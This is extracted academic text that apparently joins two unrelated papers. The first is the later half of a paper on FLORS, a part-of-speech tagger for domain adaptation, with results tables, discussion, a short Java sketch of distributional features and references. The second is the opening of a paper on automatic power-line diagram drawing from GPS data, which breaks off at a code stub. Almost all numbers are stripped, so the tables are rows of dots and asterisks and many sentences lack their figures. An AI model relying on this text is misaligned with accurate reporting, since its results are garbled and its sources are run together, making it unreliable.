each word in the window has distributional features ( left and right), , suffix features and shape features. the final feature vector for a token has a dimensionality of about , , but is very sparse. flors outperforms all baselines on the five tds newsgroups reviews weblogs answers emails wsj all oov all oov all oov all oov all oov all oov tnt . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . stanford . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . . svmtool . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . . c&p . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . . f l o r s basic . . . . . . . . . ∗ . . . n = . . . . . . . . . . . ∗ . v ± { , , } n = . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ no suffixes . . . . ∗ . . . ∗ . ∗ . ∗ . . ∗ . no shapes . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . . . ∗ . ∗ v ± { , } n = . ∗ . . ∗ . . . . . . ∗ . . ∗ . no suffixes . . ∗ . . . . . . . . . . no shapes . . . . . . . . . 
∗ . . . l = . ∗ . ∗ . ∗ . . ∗ . . ∗ . . ∗ . . ∗ . l-to-r . ∗ . . . . . . . . . . ∗ . voc. indices . . . . . . . . . ∗ . . . table : tagging accuracy of four baselines and flors on the dev sets. the table is structured as follows: baselines (lines – ), basic flors setup (lines – ), effect of omitting one of the three feature types if the word to be tagged is changed compared to the basic flors setup (lines – ) and if the word to be tagged is not changed compared to basic flors (lines – ), effect of three important configuration choices on tagging accuracy: window size (line ), inclusion of prior tagging decision (line ) and vocabulary index (line ). n: number of indicator words. l + : size of the local context window. lines – : only the neighbors of v are modified compared to basic (line ). lines – : all five token representations (including v ) are modified. a column’s best result is bold. (line vs. lines – ). only in-domain on wsj, three baselines are slightly superior. the baselines are slightly better on all accuracy because they were designed for tagging in-domain data and use feature sets that have been found to work well on the source domain. generally, c&p performs best for da among the baselines. on answers and wsj, how- ever, stanford has better overall accuracies. these results are in line with c&p. on lines – , we investigate how different mod- ifications of the basic flors model affect perfor- mance. first, we examine the effect of leaving out components of the representation: distributional fea- tures (f left(w), f right(w)), suffixes (f suffix(w)) and shape features (f shape(w)). distributional features boost performance in all domains: all and oov accuracies are consistently worse for n = (line ) than for n ∈ { , } (lines & ). flors with n = has better oov accuracies in of domains. however, all accu- racy for flors with n = is better in the major- ity of domains. the main result of this comparison is that flors does not seem to be very sensitive to the value of n if n is large enough. shape features also improve results in all do- mains, with one exception: emails (lines vs ). for emails, shape features decrease all accuracy by . and oov accuracy by . . this may be due to the fact that many oovs are nnp/nn and that tagging conventions for nnp/nn vary between do- mains. see section for discussion. performance benefits from suffixes in all domains but weblogs (lines vs ). weblogs contain many foreign names such as abdul and yasim. for these words, shapes apparently provide better informa- tion for classification than suffixes. all accura- cies suffer little when leaving out suffixes, but the feature space is much smaller: about dimen- sions. thus, for domains where we expect few oovs, omitting suffix features could be considered. lines – omit one of the components of f(vi) for all five words in the local context: i ∈ {− ,− , , , }. lines – omit the same com- ponents for the neighbor words only – i.e., i ∈ {− ,− , , } – and leave f(v ) unchanged. of the × all accuracies on lines – are worse than flors basic, are better. the largest differ- ences are . for newsgroups and . for reviews (lines vs ), but differences for the other domains are negligible. this shows that the most important feature representation is that of v (not surprisingly) and that the distributional features of the other words can be omitted at the cost of some loss in accuracy if a small average number of active features is desired. another flors parameter is the size of the local context. 
surprisingly, oov accuracies benefit a bit in four domains if we reduce l from to (lines vs ). however, all accuracy consistently drops in all six domains. this argues for using l = , i.e., a window size of . results for left-to-right (l-to-r) tagging are given on line . similar to svmtool and c&p, each sen- tence is tagged from left to right and previous tag- ging decisions are used for the current classification. in this setting, we use the previous tag pi− as one additional feature in the feature vector of vi. the effect of left-to-right is similar to the effect of omitting suffixes: oov accuracies go up in some domains, but all accuracies decrease (except for an increase of . for reviews). this is in line with the experiments in (schnabel and schütze, ) where sequential information in a crf was not ro- bust across domains. oov tagging may benefit from correct previous tags because the larger left context that is indirectly made available by left-to-right tag- ging compensates partially for the lack of informa- tion about the oov word. in contrast to standard approaches to pos tag- ging, the flors basic representation does not con- tain vocabulary indices. line shows what hap- pens if we add them; the dimensionality of the fea- ture vector is increased by |v | – where v is the training set vocabulary – and in training one binary feature is set to one for each of the five local con- text words. performance is almost indistinguishable from flors basic, suggesting that only using suf- fixes – which can be viewed as “ambiguous” vocab- ulary indices, e.g., “at” is on for “at”, “mat”, “hat”, “laundromat” etc – is sufficient. in summary, we find that distributional features, word signatures and suffixes all contribute to suc- cessful pos da. factors with only minor impact on performance are the number of indicator words used for the distributional representations, the win- dow size l and the tagging scheme (l-to-r vs. non- l-to-r). unknown words and known words behave differently with respect to certain feature choices. the different behavior of unknown and known words suggests that training and optimizing two sep- arate models – an approach used by svmtool – would further increase tagging accuracy. note that there has been at least one publication (schnabel and schütze, ) on optimizing a separate model for unknown words that has in some cases better per- formance on oov accuracy than what we publish here. however, this would complicate the architec- ture of flors. we opted for a maximally simple model in this paper, potentially at the cost of some performance. test set results. table reports results on the test sets. flors again performs significantly better on all five tds, both on all and oov. only in-domain on wsj, all performance is worse. finally, we compare our results to the pos taggers for which performance was reported at sancl (petrov and mcdonald, , ta- ble ). constituency-based parsers – which also tag words as a by-product of deriving complete parse trees – are excluded from the comparison be- cause they are trained on a richer representation, the syntactic structure of sentences. flors’ results are better than the best non-parsing-based results at sancl , which were accuracies of . on newsgroups (hit), . on reviews (hit) and . on answers (ims- ). discussion advantages of flors representation. 
as we can see in table , the main representational difference between flors and the other taggers is that the flors representation does not include vocabulary indices of the word to be tagged or its neighbors – the flors vector only consists of distributional, suffix and shape features. this is an obvious advantage for oovs. in other representational schemes, oovs have representa- tions that are fundamentally different from known schnabel and schütze ( ) report oov accuracies of . (newsgroups), . (reviews), . (weblogs), . (answers), . (emails) and . (bio) for their basic model and even higher oov accuracies if parameters are optimized on a per-domain basis. dcu-paris is listed in the dependency parser tables, but dcu-paris results are derived from a constituency parser. dcu also developed sophisticated preprocessing rules for the different domains, which can be viewed as a kind of manual domain adaptation. newsgroups reviews weblogs answers emails wsj all oov all oov all oov all oov all oov all oov tnt . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . stanford . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . . svmtool . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . . c&p . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . . flors basic . . . . . . . . . . . ∗ . table : tagging accuracy of four baselines and flors on the test sets. newsgroups reviews weblogs answers emails wsj bio pc t to ke ns unknown tag . . . . . . . oov . . . . . . . unseen word+tag . . . . . . . ac cu ra cy on un se en w or d+ ta g tnt . . . . . . . stanford . . . . . . . svmtool . . . . . . . c&p . . . . . . . flors basic . . . . . . . table : top: percentage of unknown tags, oovs and unseen word+tag combinations (i.e., known words tagged with unseen tags) in the dev sets. bottom: tagging accuracy on unseen word+tag. words – since their vocabulary index does not oc- cur in the training set and cannot be used for predic- tion. in contrast, given enough unlabeled td data, flors represents known and unknown words in es- sentially the same way and prediction of the correct tag is easier. this explanation is supported by the experiments in table : flors beats all other sys- tems on oovs – even in-domain on wsj. in our analysis we found that apart from better handling of oovs there is a second beneficial ef- fect of distributional representations: they facilitate the correct tagging of known words occurring with tags unseen in the training set, which we call un- seen word+tags. table gives statistics on this case and shows that unseen word+tags occur at least two times as often out-of-domain (e.g., . % for we- blogs) than in-domain (. % for wsj). the bottom part of the table shows performance of the five tag- gers on unseen word+tags. flors is the top per- former on all seven domains, with large differences of more than % in some domains. the explanation is similar to the oov case: flors does not restrict the set of possible pos’s of a word. the other taggers in table use the vocabu- lary index of the word to be tagged and will therefore give a strong preference to seen tags. since flors uses distributional features, it can more easily assign an unseen tag as long as it is compatible with the overall pattern of distribution, suffixes and shapes typical of the tag. c&p also perform relatively well on unseen word+tag due to the ambiguity classes in their model, but flors representations are better for every domain. 
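to make concrete why an unknown word receives a representation of the same type as a known word, the following sketch (illustrative names only, not the original code) builds the tf-weighted left-neighbor count vector described in the experimental setup for an arbitrary word from unlabeled target-domain text; the right-neighbor vector is built analogously, so the same construction applies whether or not the word occurs in the labeled training data.

import java.util.*;

// sketch: left-neighbor distributional features for word w.
// entry i = tf(number of times indicator word c_i occurs immediately left of w),
// with tf(x) = 1 + log(x); the extra last entry collects all omitted (non-indicator) contexts.
class DistributionalSketch {
    static double tf(long x) { return x > 0 ? 1.0 + Math.log(x) : 0.0; }

    // sentences are assumed to be lowercased and padded with boundary tokens
    static double[] leftVector(String w, List<String[]> sentences,
                               Map<String, Integer> indicatorIndex, int n) {
        long[] counts = new long[n + 1];
        for (String[] sent : sentences) {
            for (int j = 1; j < sent.length; j++) {
                if (!sent[j].equals(w)) continue;
                Integer idx = indicatorIndex.get(sent[j - 1]);
                counts[idx == null ? n : idx]++;          // last slot = omitted contexts
            }
        }
        double[] v = new double[n + 1];
        double norm = 0.0;
        for (int i = 0; i <= n; i++) { v[i] = tf(counts[i]); norm += v[i] * v[i]; }
        norm = Math.sqrt(norm);
        if (norm > 0) for (int i = 0; i <= n; i++) v[i] /= norm;  // normalize to unit length
        return v;
    }
}

because the vector is built purely from unlabeled counts, it can also be updated on the fly by incrementing the counts as new occurrences of a word are encountered.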
we take these results to mean that constraints on a word’s possible pos tags may well be helpful for in-domain data, but for out-of-domain data an overly strong bias for a word’s observed tags is harmful. it is important to stress that representations sim- ilar to flors representations have been used for a long time; we would expect many of them to have similar advantages for unseen word+tags. e.g., brown clusters (brown et al., ) and word em- beddings (collobert et al., ) are similar to flors in this respect. however, flors represen- tations are extracted by simple counting whereas the computation of brown clusters or word embeddings is much more expensive. the speed with which flors representations can be computed is partic- ularly beneficial when taggers need to be adapted to new domains. flors can easily adapt its rep- resentations on the fly – as each new occurrence of a word is encountered, the counts that are the basis for the xi can simply be incremented. we present a direct comparison of flors representations with other representations in section . “local context” vs. sequence classification. the most common approach to pos tagging is to tag a sentence with its most likely sequence; in contrast, independent tagging of local context is not guaran- teed to find the best sequence. recent work on en- glish suggests that window-based tagging can per- form as well as sequence-based methods (liang et al., ; collobert et al., ). toutanova et al. ( ) report similar results. in our experiments, we also did not find consistent improvements when we incorporated sequence constraints (table , line ). however, there may be languages and appli- cations involving long-distance relationships where local-context classification is suboptimal. local-context classification has two advantages compared to sequence classification. (i) it simplifies the classification and tagging setup: we can use any existing statistical classifier. sequence classification limits the range of methods that can be applied; e.g., it is difficult to find a good crf implementation that can handle real-valued features – which are of criti- cal importance for our representation. (ii) the time complexity of flors in tagging is o(skf) where s is the length of the sentence, k is the number of tags and f is the number of non-zero fea- tures per local-context representation. in contrast, sequence decoding complexity is o(sk f). this difference is not of practical importance for stan- dard english pos sets, but it could be an argument against sequence classification for tagging problems with much larger tag sets. in summary, replacing sequence classification with local-context classification is attractive for large-scale, practical tagging. what da can and cannot do. despite the supe- rior da tagging results we report for flors in this paper, there is still a gap of %– % (depending on the domain) between in-domain wsj accuracy and da accuracy on sancl. in our analysis of this gap, we found some evidence that da performance can be further improved – especially as more unlabeled td data becomes available. but we also found two reasons for low performance that unsupervised da cannot do anything about: differences in tag sets – or unknown tags – and differences in annotation guide- lines. table shows that unknown tags occur in five of the seven tds at rates between % (weblogs) and % (bio). each token that is tagged with an un- known tag is necessarily an error in unsupervised da. 
furthermore, the unknown tag can also im- pact tagging accuracy in the local context – so the unknown tag rates in table are probably lower bounds for the error that is due to unknown tags. based on these considerations, it is not surprising that tagging accuracy (e.g., of flors basic) and unknown tag rate are correlated as we can see in ta- bles , and ; e.g., we get the highest accuracies in the two domains that do not have unknown tags (weblogs and wsj) and the lowest accuracy in the domain with the highest rate (bio). since unknown tags cannot be predicted correctly, one could simply report accuracy on known tags. however, given the negative effect of unknown tags on tagging accuracy of the local context in which they occur, excluding unknown tags does not fully address the problem. for this reason, it is probably best to keep the common practice of simply report- ing accuracy on all tokens, including unknown tags. but the percentages of unknown tags should also be reported for each dataset as a basis for a more accu- rate interpretation of results. another type of error that cannot be avoided in unsupervised da is due to differences in annota- tion guidelines. there are a few such problems in sancl; e.g., file names like “services.doc” are an- notated as nn in the email domain. but their dis- tributional and grammatical behavior is more simi- lar to nnps; as a consequence, most file names are incorrectly tagged. in general, it is difficult to dis- criminate nns from nnps. the penn treebank an- notation guidelines (santorini, ) are compatible with either tag in many cases and it may simply be impossible to write annotation guidelines that avoid these problems (cf. manning ( )). nn-nnp in- consistencies are especially problematic for oov tagging since most oovs are nns or nnps. for example, there is a special tag add in the web do- main for web addresses. the last two words of the sentence “i would like to host my upcoming website to/in liquid- web.com/add” are mistagged by stanford tagger as “... to/to liquidweb.com/vb”. so the missing tag in this case also affects the tagging of surrounding words. bio dev wsj train oov all all nn . . . jj . . . nns . . . nnp . . . nnps . . . table : frequency of some tags (percent of tokens) for bio dev and wsj train. while the amount of inconsistent annotation is limited for sancl, it is a serious problem for bio. table shows that the proportion of nnps in bio is less than a tenth of that in wsj (. in bio vs. . in wsj). this is due to the fact that many bio- specific names, in particular genes, are annotated as nn. in contrast, the distributionally and orthograph- ically most similar names in wsj are tagged as nnp. for example, we find “one cell was teased out, and its dna/nnp extracted” in wsj vs. “dna/nn was isolated” in bio. standard setup nnp→nn all oov all oov tnt . ∗ . ∗ . ∗ . ∗ stanford . ∗ . ∗ . ∗ . ∗ svmtool . ∗ . ∗ . . ∗ c&p . ∗ . ∗ . ∗ . ∗ f l o r s basic . . . . n = . . . . n = . ∗ . ∗ . ∗ . ∗ no suffixes . ∗ . ∗ . ∗ . ∗ no shapes . ∗ . ∗ . ∗ . ∗ l = . . . . table : tagging accuracy on bio dev. nnp→nn results were obtained by replacing nnps with nns. given this large discrepancy in the frequency of the tag nnp – which arguably is due to different annotation guidelines, not due to underlying differ- ences between the two genres – bio should proba- bly not be used for evaluating da. this is why we did not include it in our comparison in table . for sake of completeness, we provide tagging ac- curacies for bio in table , “standard setup”. 
the results are in line with sancl results: flors beats the baselines on all and oov accuracies. however, if we build the nn bias into our model by simply replacing all nnp tags with nn tags, then accuracy goes up by % on all and by almost % on oov. even tnt, the most basic tagger, achieves all/oov accuracy of . / . , better than any method in the standard setup. these accuracies are well above those in (blitzer et al., ) and (huang and yates, ). since simply replacing nnps with nns has such a large effect, bio cannot be used sensibly for eval- uating da methods. in practice, it is not possible to separate “true” improvements due to generic bet- ter da from elements of the proposed method that simply introduce a negative bias for nnp. in summary, when comparing different da meth- ods caution should be exercised in the choice of do- mains. in particular, the effect of unknown tags should be made transparent and the gold standards should be analyzed to determine whether the task addressed in the td differs significantly in some as- pects from that addressed in the source domain. comparison of word representations our approach to da is an instance of representation learning: we aim to find representations that are ro- bust across domains. in this section, we compare flors with two other widely used representation learning methods: (i) brown clusters (brown et al., ) and (ii) c&w embeddings, the word embed- dings of collobert et al. ( ). we use f dist(w) = f left(w)⊕f right(w) to refer to our own distributional word representations (see section ). the perhaps oldest and most frequently used low- dimensional representation of words is based on brown clusters. typically, prefixes of brown clus- ters (brown et al., ) are added to increase the robustness of pos taggers (e.g., toutanova et al. ( )). computational costs are high (quadratic in the vocabulary size) although the computation can be parallelized (uszkoreit and brants, ). more recently, general word representations (col- lobert et al., ; turian et al., ) have been used for robust pos tagging. these word represen- tations are typically trained on a large amount of un- labeled text and fine-tuned for specific nlp tasks. similar to brown clusters, they are low-dimensional and can be used as features in many nlp tasks, ei- ther alone or in combination with other features. to compare f dist(w) (our distributional repre- sentations) with brown clusters, we induced brown clusters on the joint corpus data dall (see section ) using the publicly available implemen- tation of liang ( ). we padded sentences with 〈boundary〉 tokens on each side and used path prefixes of length , , and as features for each word (cf. ratinov and roth ( ), turian et al. ( )). c&w embeddings are provided by collobert et al. ( ): -dimensional vectors for , words from wsj, trained on wikipedia. similar to our dis- tributional representations fdist(w), the embeddings also contain a 〈boundary〉 token (which they call padding). moreover, they have a special em- bedding for unknown words (called unknown) which we use whenever we encounter a word that is not in their lookup table. we preprocess our raw tokens the same way they do (lowercase and replace sequences of digits by “ ”) before we look up a rep- resentation during training and testing. we replaced the distributional features in our ba- sic setup by either brown cluster features or c&w embeddings. table repeats lines and of table and gives results of the modified flors setup. 
all three representations improve both all and oov accuracies in all domains. fdist outperforms brown in all cases except for oov on emails. brown may suffer from noisy data; cleaning meth- ods have been used in the literature (liang, ; turian et al., ), but they are not unproblematic since a large part of the data available is lost, which results in more unknown words. brown and fdist can be directly compared since they were trained on exactly the same data. fdist and c&w are harder to compare directly because there are many differences. (i) c&w is trained on a much larger dataset. one consequence of this is that oov accuracy on wsj may be higher because some words that are unknown for other methods are actually known to c&w. (ii) c&w vectors are not trained on the sancl td data sets – this gives fdist an advantage. (iii) c&w vectors are not trained on the wsj. again, this could give fdist an advantage. (iv) c&w and fdist are fundamentally different in the way they handle unknown words. c&w has a lim- ited vocabulary and must replace all words not in this vocabulary by the token unknown. in con- trast, fdist can create a meaningful individual repre- sentation for any oov word it encounters. our flors tagger provides best all accuracies in all domains but wsj, where c&w has best re- sults. the good performance of c&w is rather un- surprising since the embeddings were created for the , most frequent words of the wsj and thus cover the wsj domain much better. also, wsj was used to tune parameters during development. as with our previous experiments, oov results on emails seem slightly more sensitive to parameter choices than on other domains (recall the discussion of this issue in section ). in summary, we have shown that fdist represen- tations work better for pos da than brown clus- ters. furthermore, the evidence we have presented suggests that fdist are comparable in performance to c&w embeddings if not better for pos da. the most important difference between fdist and brown / c&w is that fdist are much simpler and much faster to compute. they are simpler because they are just slightly transformed counts in contrast to the other two approaches, which solve complex optimization problems. fdist can be computed effi- ciently through simple incrementation in one pass through the corpus. in contrast, the other two ap- proaches are an order of magnitude slower. related work unsupervised da methods can be broadly put into four categories: representation learning and constraint-based frameworks – which require some tailoring to a task – and instance weighting and boot- strapping – which can be more generally applied to a wide range of problems. since many approaches are application-specific, we focus on the ones that have been applied to pos tagging. representation learning. we already discussed two important approaches to representation learning in section : c&w embeddings and brown clusters. blitzer et al.’s ( ) structural correspondence learning (scl) supports da by creating similar representations for correlated features in the pivot feature space. this is a potentially powerful method. flors is simpler in that correlations are made directly accessible to the supervised learner. newsgroups reviews weblogs answers emails wsj all oov all oov all oov all oov all oov all oov f l o r s fdist(w), n= . . . . . . . . . . . . fdist(w), n= . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ c&w for fdist(w) . . . ∗ . ∗ . . ∗ . . . . . . brown for fdist(w) . ∗ . ∗ . ∗ . ∗ . . . ∗ . ∗ . ∗ . . ∗ . 
table : tagging accuracy of different word representations on the dev sets. line corresponds to flors basic. n: number of indicator words. a column’s best result is bold. moreover, flors representations consist of simple counts whereas scl solves a separate optimization problem for each pivot feature. umansky-pesin et al. ( ) derive distributional information for oovs by running web queries. this approach is slow since it depends on a search engine. ganchev et al. ( ) successfully use search logs. this is a promising enhancement for flors. huang and yates ( ) evaluate crfs with dis- tributional features. they examine lower dimen- sional feature representations using svd or the la- tent states of an unsupervised hmm. they find bet- ter accuracies for their hmm method than blitzer et al. ( ); however, they do not compare them against a crf baseline using distributional features. in later work, huang and yates ( ) add the la- tent states of multiple, differently trained hmms as features to their crf. huang and yates ( ) ar- gue that finding an optimal feature representation is computationally intractable and propose a new framework that allows prior knowledge to be inte- grated into representation learning. latent sequence states are a form of word repre- sentation. thus, it would be interesting to compare them to the non-sequence-based distributional rep- resentation that flors uses. constraint-based methods. rush et al. ( ) use global constraints on oovs to improve out-of- domain tagging. although constraints ensure con- sistency, they require careful manual engineering. distributional features can also be seen as a form of constraint since feature weights will be shared among all words. subramanya et al. ( ) construct a graph to en- courage similar n-grams to be tagged similarly, re- sulting in moderate gains in one domain, but no gains on bio when compared to self-training. the reason could be an insufficient amount of unsuper- vised data for bio ( , sentences). our ap- proach does not seem to suffer from this problem. bootstrapping. both self-training (mcclosky et al., ) – which uses one classification model – and co-training (blum and mitchell, ) – which uses ≥ models – have been applied to pos tagging. self-training usually improves a pos baseline only slightly if at all (huang et al., ; huang and yates, ). devising features based on labeled in- stances (instead of training on them) has been more successful (florian et al., ; søgaard, ). chen et al. ( ) use co-training for da. in each round of their algorithm, both new training instances from the unlabeled data and new features are added. their model is limited to binary classification. the co-training method of kübler and baucom ( ) trains several taggers and adds sentences from the td to the training set on which they agree. they report slight, but statistically significant increases in accuracy for pos tagging of dialogue data. instance weighting. instance weighting formal- izes da as the problem of having data from differ- ent probability distributions in each domain. the goal is to make these two distributions align by us- ing instance-specific weights during training. jiang and zhai ( ) propose a framework that integrates prior knowledge from different data sets into the learning objective by weights. in related work, c&p train generalized and domain-specific models. an input sentence is tagged by the model that is most similar to the sentence. 
flors could be easily extended along these lines, an experiment we plan for the future. in terms of the basic classification setup, our pos tagger is most similar to the svm-based approaches of giménez and màrquez ( ) and c&p. how- ever, we do not use a left-to-right approach when tagging sentences. moreover, svmtool trains two separate models, one for oovs and one for known words. flors only has a single model. in addition, we do not make use of ambiguity classes, token-tag dictionaries and rare feature thresholds. instead, we rely only on three types of features: distributional representations, suffixes and word shapes. the local-context-only approach of svmtool, c&p and flors is different from standard se- quence classification such as memms (e.g., rat- naparkhi ( ), toutanova et al. ( ), tsuruoka and tsujii ( )) and crfs (e.g., collins ( )). sequence models are more powerful in theory, but this may not be an advantage in da because the sub- tle dependencies they exploit may not hold across domains. conclusion we have presented flors, a new pos tagger for da. flors uses robust representations that work especially well for unknown words and for known words with unseen tags. flors is simpler and faster than previous da methods, yet we were able to demonstrate that it has significantly better accu- racy than several baselines. acknowledgments. this work was supported by dfg (deutsche forschungsgemeinschaft). references john blitzer, ryan mcdonald, and fernando pereira. . domain adaptation with structural correspon- dence learning. in emnlp, pages – . avrim blum and tom mitchell. . combining la- beled and unlabeled data with co-training. in colt, pages – . thorsten brants. . tnt: a statistical part-of-speech tagger. in anlp, pages – . peter f. brown, peter v. desouza, robert l. mercer, vin- cent j. della pietra, and jenifer c. lai. . class- based n-gram models of natural language. computa- tional linguistics, : – . minmin chen, kilian q. weinberger, and john blitzer. . co-training for domain adaptation. in nips, pages – . jinho d. choi and martha palmer. . fast and robust part-of-speech tagging using dynamic model selection. in acl: short papers, pages – . michael collins. . discriminative training methods for hidden markov models: theory and experiments with perceptron algorithms. in emnlp, pages – . ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel kuksa. . natural language processing (almost) from scratch. the journal of machine learning research, : – . rong-en fan, kai-wei chang, cho-jui hsieh, xiang-rui wang, and chih-jen lin. . liblinear: a li- brary for large linear classification. the journal of machine learning research, : – . steven finch and nick chater. . bootstrapping syn- tactic categories using statistical methods. in back- ground and experiments in machine learning of nat- ural language, pages – . radu florian, hany hassan, abraham ittycheriah, hongyan jing, nanda kambhatla, xiaoqiang luo, nicolas nicolov, and salim roukos. . a statisti- cal model for multilingual entity detection and track- ing. in hlt-naacl, pages – . kuzman ganchev, keith hall, ryan mcdonald, and slav petrov. . using search-logs to improve query tag- ging. in acl: short papers, pages – . jesús giménez and lluís màrquez. . svmtool: a general pos tagger generator based on support vector machines. in lrec, pages – . fei huang and alexander yates. . distributional representations for handling sparsity in supervised sequence-labeling. in acl-ijcnlp, pages – . 
fei huang and alexander yates. . exploring representation-learning approaches to domain adapta- tion. in danlp, pages – . fei huang and alexander yates. . biased repre- sentation learning for domain adaptation. in emnlp- conll, pages – . zhongqiang huang, vladimir eidelman, and mary harper. . improving a simple bigram hmm part- of-speech tagger by latent annotation and self-training. in naacl-hlt: short papers, pages – . jing jiang and chengxiang zhai. . instance weight- ing for domain adaptation in nlp. in acl, pages – . s. sathiya keerthi and chih-jen lin. . asymptotic behaviors of support vector machines with gaussian kernel. neural computation, ( ): – . sandra kübler and eric baucom. . fast domain adaptation for part of speech tagging for dialogues. in ranlp, pages – . percy liang, hal daumé iii, and dan klein. . structure compilation: trading structure for features. in icml, pages – . percy liang. . semi-supervised learning for natural language processing. master’s thesis, massachusetts institute of technology. christopher d. manning. . part-of-speech tagging from % to %: is it time for some linguistics? in cicling, pages – . mitchell p. marcus, mary ann marcinkiewicz, and beat- rice santorini. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ): – . david mcclosky, eugene charniak, and mark johnson. . reranking and self-training for parser adapta- tion. in acl, pages – . john miller, manabu torii, and vijay k. shanker. . building domain-specific taggers without annotated (domain) data. in emnlp-conll, pages – . slav petrov and dan klein. . improved inference for unlexicalized parsing. in hlt-naacl, pages – . slav petrov and ryan mcdonald. . overview of the shared task on parsing the web. notes of the st sancl workshop. lev ratinov and dan roth. . design challenges and misconceptions in named entity recognition. in conll, pages – . adwait ratnaparkhi. . a maximum entropy model for part-of-speech tagging. in emnlp, pages – . alexander m. rush, roi reichart, michael collins, and amir globerson. . improved parsing and pos tagging using inter-sentence consistency constraints. in emnlp-conll, pages – . beatrice santorini. . part-of-speech tagging guide- lines for the penn treebank project ( rd revision, nd printing). technical report, department of linguistics, university of pennsylvania. tobias schnabel and hinrich schütze. . towards robust cross-domain domain adaptation for part-of- speech tagging. in ijcnlp, pages – . hinrich schütze. . part-of-speech induction from scratch. in acl, pages – . hinrich schütze. . distributional part-of-speech tagging. in eacl, pages – . anders søgaard. . semisupervised condensed near- est neighbor for part-of-speech tagging. in acl: short papers, pages – . amarnag subramanya, slav petrov, and fernando pereira. . efficient graph-based semi-supervised learning of structured tagging models. in emnlp, pages – . kristina toutanova, dan klein, christopher d. manning, and yoram singer. . feature-rich part-of-speech tagging with a cyclic dependency network. in naacl- hlt, pages – . yoshimasa tsuruoka and jun’ichi tsujii. . bidirec- tional inference with the easiest-first strategy for tag- ging sequence data. in emnlp-hlt, pages – . joseph turian, lev ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in acl, pages – . shulamit umansky-pesin, roi reichart, and ari rap- poport. . a multi-domain web-based algorithm for pos tagging of unknown words. 
in coling, pages – . jakob uszkoreit and thorsten brants. . distributed word clustering for large scale class-based language modeling in machine translation. in acl, pages – .

international journal of advanced network, monitoring and controls, volume , no. , doi: . /ijanmc- -

design of electric power line drawing algorithm

sun pengzhan, school of computer science and engineering, xi'an technological university, xi'an, , china, e-mail: @qq.com
lei juchao, school of computer science and engineering, xi'an technological university, xi'an, , china, e-mail: leijuchao@ .com

abstract—at present, the drawing of power lines is still in a state of semi-manual design, mainly completed with autocad, which not only consumes human resources but also has low efficiency. therefore, this paper designs automatic drawing software for power lines that integrates drawing and data management. based on the basic information of the power lines, the software imports the basic power data (latitude and longitude data) containing gps/beidou positioning information and automatically converts it into the distance, direction, angle and other information of poles and cables. it then draws the power line graph automatically and to scale using a multi-tree traversal algorithm. the software is easy to operate and reliable, and has achieved good results in practice.

keywords-power lines; automatic drawing; the database; multiple tree; traversal algorithm

i. introduction

the power grid directly faces end users and is closely related to people's production and daily life; it is an important piece of public infrastructure serving the people's livelihood. in recent years, with the development of new-type urbanization, china has been committed to the construction and renovation of the power grid in order to realize reliable power supply and high-quality service and to improve supply efficiency. power grid construction and reconstruction has become an urgent task for the current power industry. after the completion of a power grid transformation, the power supply enterprises need to draw and archive the power line diagram, which is usually drawn semi-manually with autocad. however, autocad requires professionals to use different drawing tools when drawing, and if it is necessary to change the position of a pole or change the information of a power line, the diagram needs to be redrawn.
therefore, the shortcomings of this kind of design method are obvious: the design workload is large, it is time-consuming and laborious, the efficiency is low, and it can no longer meet the demands of the electronic age[ - ]. in order to provide a convenient drawing function, this paper designs and implements automatic drawing software for power lines. the system calculates the various parameters of a line from gps data (longitude and latitude data) and stores them in the database, and then automatically generates a standard and clean power circuit diagram from the information stored in the database. if some information needs to be changed after the completion of power grid construction or reconstruction, only the corresponding data need to be changed for the diagram to be drawn again automatically. this software provides a strong guarantee for reducing labor intensity, improving work efficiency and plotting quality, and shortening the plotting cycle.

ii. power line structure analysis

power equipment mainly includes generator sets, power distribution devices, lighthouse bridge columns, fuses, transformers, transformer tables, automatic control devices, watt-hour meters, high-voltage switches, high-voltage circuit breakers, capacitors, lightning arresters, current transformers, voltage transformers, cable lines, power lines, etc. since generator sets are not fixed on the power line, the power lines discussed in this system mainly refer to lines composed of outdoor poles, cables and transformer stations (including box transformers). because outdoor lines cover a wide area, the environment is complex and changeable, and the routing modes of the lines are diverse, the factors to be considered in drawing are also relatively complex. however, no matter how complicated and diverse the actual power lines are, all power lines are connected to the user end through transformer outgoing lines and several poles, so a power line is essentially a standard multi-branch tree structure. as shown in fig. , the power line in each area is essentially a multi-branch tree with the transformer as the root node (node ), and each pole in the line is a node of the multi-branch tree, i.e., t = { , , , , , , , } is a tree with root . the nodes other than the root node can be divided into n disjoint finite sets, and each set is a subtree of the root node[ ].

figure . schematic diagram of the power line multi-branch tree structure

in the actual drawing process, whether drawing manually or automatically, the transformer is generally selected as the starting point. the process is as follows: starting from the starting point, find the next pole connected to it through the relationships between the nodes, obtain the parameters of the node relative to its parent node, such as the distance, rotation angle and steering, and then calculate the relative coordinates of the node. this drawing process is very similar to the traversal of a multi-fork tree, which makes automatic power line drawing possible. in the actual circuit drawing process, the four basic data items of span, angle, steering and pole number can be obtained during power grid reconstruction or construction, or gps can be used to obtain the latitude and longitude of each pole, which is then converted into span, veer and angle, as illustrated in the sketch below.
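as a rough sketch of this latitude/longitude conversion (illustrative code with assumed names and degree-to-radian handling, not the paper's implementation; the paper's own formulas are given in section iii.c), the span and angle between two poles can be computed as follows.

// sketch: distance ("span") and simplified bearing ("angle") between poles a and b,
// where j is the longitude and w is the latitude, both given in degrees.
class GeoSketch {
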